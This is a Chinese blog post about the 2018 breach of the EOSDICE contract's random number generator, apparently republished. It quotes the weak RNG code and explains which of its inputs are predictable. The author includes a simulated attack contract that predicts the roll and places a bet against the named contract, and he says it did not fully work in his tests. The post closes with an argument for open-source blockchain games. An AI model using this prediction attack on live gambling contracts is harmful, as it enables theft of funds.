源码

首页 » 归档 » 源码 » EOS DICE随机数被攻破:区块链游戏需要开源吗?

EOS DICE随机数被攻破:区块链游戏需要开源吗?

EOSDICE

1.jpg

今天起床看到 EODICE随机数竟然被攻破了?

之前我还看过代码,觉得挺安全的,看来我还是太菜了

随机数代码如下 (来源于github)

uint8_t random(account_name name, uint64_t game_id)
{
    asset pool_eos = eosio::token(N(eosio.token)).get_balance(_self, symbol_type(S(4, EOS)).name());
    auto mixd = tapos_block_prefix() * tapos_block_num() + name + game_id - current_time() + pool_eos.amount;

    const char *mixedChar = reinterpret_cast<const char *>(&mixd);

    checksum256 result;
    sha256((char *)mixedChar, sizeof(mixedChar), &result);

    uint64_t random_num = *(uint64_t *)(&result.hash[0]) + *(uint64_t *)(&result.hash[8]) + *(uint64_t *)(&result.hash[16]) + *(uint64_t *)(&result.hash[24]);
    return (uint8_t)(random_num % 100 + 1);
}

可以看到生成随机数 有几个特别的东西

  1. game_id 这个是递增的,可以拿到

  2. account_name 这个是玩家的用户名,可以拿到

  3. pool_eos 这个是当前合约的余额,如果短时间没有人玩的话,是可以拿到固定的值的

  4. tapos_block_prefix & tapos_block_num 这两个是区块内部的值,如果我用合约来攻击的话,可以拿到

  5. current_time 当前时间戳(合约用了延时交易)

我当时看到这个合约的时候,其实有想过怎么攻击,但是发现变量比较多,应该比较难,攻击合约需要满足以下条件

  1. 需要短时间内没有人玩,要不然game_id 与 pool_eos都会变动,导致你攻击失败

  2. 必须要把攻击合约与 出结果 的时间控制在一个区块内,要不然 tapos_block_prefix & tapos_block_num 这两个数会发生改变

  3. 之前我一直觉得没办法攻击的是 时间,因为合约取的是未来时间的(其实发现了eos 延时合约运行的话,延时多久,时间往后加就行了。。。) 这点要是想明白了,说不定暴富的人就是我了…

我写的一个模拟攻击合约,不知道是不是因为本地测试的原因,tapos_block_prefix & tapos_block_num 一直对不上

其实本来想 直接从合约拿到他的 game_id的,但是一直没有成功…

void charity::hi(uint64_t game_id)

{
    asset pool_eos = eosio::token(N(eosio.token)).get_balance(N(eosbocai2222), symbol_type(S(4, EOS)).name());
    pool_eos.amount += 9985;
    uint64_t t = current_time();
    t += 1000000;
    auto mixd = tapos_block_prefix() * tapos_block_num() + _self + game_id - t + pool_eos.amount;
    const char *mixedChar = reinterpret_cast<const char *>(&mixd);

    checksum256 result;
    sha256((char *)mixedChar, sizeof(mixedChar), &result);

    uint64_t random_num = *(uint64_t *)(&result.hash[0]) + *(uint64_t *)(&result.hash[8]) + *(uint64_t *)(&result.hash[16]) + *(uint64_t *)(&result.hash[24]);
    print("random", random_num % 100 + 1);

    // return (uint8_t)(random_num % 100 + 1);
    asset payout = asset(10000, S(4, EOS));
    action(
        permission_level{_self, N(active)},
        N(eosio.token), N(transfer),
        std::make_tuple(_self, N(eosbocai2222), payout, std::string("dice-rrr-50-")))
        .send();
}

来一张测试截图

2.jpg

可以看到除了 tapos_block_prefix & tapos_block_num 这两个不一样的话,其他的都一样的,

tapos_block_num 应该是每次+1,tapos_block_prefix 不知道生成规则,但是如果在一个区块内,应该是能拿到相同的.

事件回顾

根据官方给出的账号,我找到了黑客的攻击截图

3.jpg

4.jpg

5.jpg

不知道黑客代码怎么写的,他现在已经把合约换掉了…并且吧钱转到了交易所

根据官方所说,他们有对合约自动检测工具,导致被发现疑似黑客事件,立马把钱转走了.

这一点还是值得表扬的,说明团队实力还是有的。(希望可以开源,这样的话,其他的dice被攻击了也不至于损失那么惨)

6.jpg

自动转账截图

好像公告发布的也比较早,不知道是不是 自动检测功能能把人call醒(哈哈哈)

总结与反思

7.jpg

当被攻击后,有网友在官方群发了这样的一句话…

让我想起一个笑话

A: 为什么你玩DApp?

B: 因为开源透明代码可见,更公平

A:最近玩什么呢

B:EOS上的菠菜

A:开源了么?

B:没有

我一直觉得 区块链合约肯定要开源,要不然和其他的有啥区别呢?

我个人为啥投了这个游戏呢?是因为这个游戏开源,符合我理想中的区块链游戏,不会发生黑我的情况…

本以为他做大了,能给整个社区起一个带头作用,告诉大家,开源合约也没事情的,区块链游戏就是需要开源!

但是还好,损失不是很大。

最后借用老猫的一张图

8.jpg

本文作者:高金

本文地址: https://igaojin.me/2018/11/04/EODIDEC-随机数被攻破/

(0)

本文由 投稿者 创作,文章地址:https://blog.isoyu.com/archives/eos-dicesuijishubeigongpoqukuailianyouxixuyaokaiyuanma.html
采用知识共享署名4.0 国际许可协议进行许可。除注明转载/出处外,均为本站原创或翻译,转载前请务必署名。最后编辑时间为:11 月 9, 2018 at 12:42 上午

热评文章

发表回复

[必填]

我是人?

提交后请等待三秒以免造成未提交成功和重复